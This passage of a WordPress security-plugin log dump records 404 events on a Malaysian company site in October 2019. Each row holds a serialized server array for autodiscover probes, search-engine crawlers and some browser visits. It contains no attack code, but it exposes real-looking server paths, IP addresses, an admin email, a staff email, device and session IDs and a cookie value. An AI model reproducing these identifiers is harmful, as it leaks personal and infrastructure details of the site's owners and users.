Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"58277\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2UzTYvewXbs3FTz9-2ZwAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570608333.9934\";s:12:\"REQUEST_TIME\";s:10:\"1570608333\";}}','notice','2019-10-09 08:05:35','2019-10-09 08:05:34',35031808,36836824,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27771,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"263-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B34DCCE5-4E3F-4432-9FD7-5262613970C1\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"263-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ2RD1eCSx7farFWWaNKRwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"55554\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2RD1eCSx7farFWWaNKRwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570607375.7432\";s:12:\"REQUEST_TIME\";s:10:\"1570607375\";}}','notice','2019-10-09 07:49:37','2019-10-09 07:49:36',35409504,37214632,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27770,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"76E5B6E1-2319-4A76-BEFB-C79A63C18BC2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ2P8jYvewXbs3FTz9-xnQAAAZA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"50357\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2P8jYvewXbs3FTz9-xnQAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570607090.3278\";s:12:\"REQUEST_TIME\";s:10:\"1570607090\";}}','notice','2019-10-09 07:44:52','2019-10-09 07:44:50',35397896,37191104,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27769,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"41BC48AE-F59A-45AA-BD0B-6846DB066BC7\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ2NyVeCSx7farFWWaNKFwAAAQ8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"64667\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2NyVeCSx7farFWWaNKFwAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570606537.691\";s:12:\"REQUEST_TIME\";s:10:\"1570606537\";}}','notice','2019-10-09 07:35:40','2019-10-09 07:35:38',35893928,37692896,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27768,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Whale/1.0.40.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"95.79.28.168\";s:11:\"REMOTE_PORT\";s:5:\"40858\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ2AQzYvewXbs3FTz9-lLAAAAYg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570603075.8646\";s:12:\"REQUEST_TIME\";s:10:\"1570603075\";}}','notice','2019-10-09 06:37:57','2019-10-09 06:37:56',35032536,36839176,'https://bintara.com.my/?page_id=18',1,0,'95.79.28.168'),(27767,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ190wdB7FBR0bQuaTuYJwAAAAc\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.107\";s:11:\"REMOTE_PORT\";s:4:\"8578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ190wdB7FBR0bQuaTuYJwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570602451.2045\";s:12:\"REQUEST_TIME\";s:10:\"1570602451\";}}','notice','2019-10-09 06:27:33','2019-10-09 06:27:31',33982192,35778488,'https://bintara.com.my/toughbook-31/',1,0,'157.55.39.107'),(27765,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.4 Safari/537.36 Chrome/66.0.3359.130\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.188.84.138\";s:11:\"REMOTE_PORT\";s:5:\"50917\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ1ynAdB7FBR0bQuaTuSrAAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570599580.4403\";s:12:\"REQUEST_TIME\";s:10:\"1570599580\";}}','notice','2019-10-09 05:39:43','2019-10-09 05:39:40',35427304,37231624,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'5.188.84.138'),(27766,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/tag/markup/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/tag/markup/\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/tag/markup/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ130zYvewXbs3FTz9-bLAAAAZY\";s:12:\"REDIRECT_URL\";s:12:\"/tag/markup/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.124\";s:11:\"REMOTE_PORT\";s:5:\"37658\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/tag/markup/\";s:10:\"SCRIPT_URL\";s:12:\"/tag/markup/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ130zYvewXbs3FTz9-bLAAAAZY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570600915.743\";s:12:\"REQUEST_TIME\";s:10:\"1570600915\";}}','notice','2019-10-09 06:02:00','2019-10-09 06:01:56',35525720,37322728,'https://bintara.com.my/tag/markup/',1,0,'54.36.150.124'),(27764,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{CDF343D9-CDD9-4E0B-9F11-5B7ACA9094CC}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ1gkjYvewXbs3FTz9-MSAAAAZU\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"54628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\